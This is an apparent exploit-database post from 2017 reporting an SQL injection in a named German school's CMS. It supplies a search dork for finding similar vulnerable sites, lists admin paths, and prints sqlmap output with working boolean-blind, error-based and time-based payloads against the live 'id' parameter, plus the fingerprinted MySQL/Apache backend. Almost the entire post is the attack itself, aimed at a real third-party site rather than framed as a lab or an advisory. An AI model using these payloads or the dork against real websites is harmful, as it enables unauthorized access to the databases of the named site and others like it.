Error In Database At The Beginning Of Page - SQLi - SQLinjection

Published
Credit
Risk
2017.08.06
Informacion - Anonymous
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: "inurl:index.php?id=+intext: Error"

-- Fecha: 5/08/2017
-- Win10
-- http(s)//:site.com/admin, admincp , admin.html ,admin.php , etc.
-- Demo:
=== http://www.gymnasium-lichtenstein.de/cms/index.php?id=83
-- PoFF: ======= * ======= * Parameter: id (GET)
======= Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=83' AND 2370=2370 AND 'PElS'='PElS

======= Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=83' AND (SELECT 5255 FROM(SELECT COUNT(*),CONCAT(0x716a786b71,(SELECT (ELT(5255=5255,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sIDg'='sIDg

======= Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=83' AND SLEEP(5) AND 'ecpY'='ecpY
---
[04:16:39] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com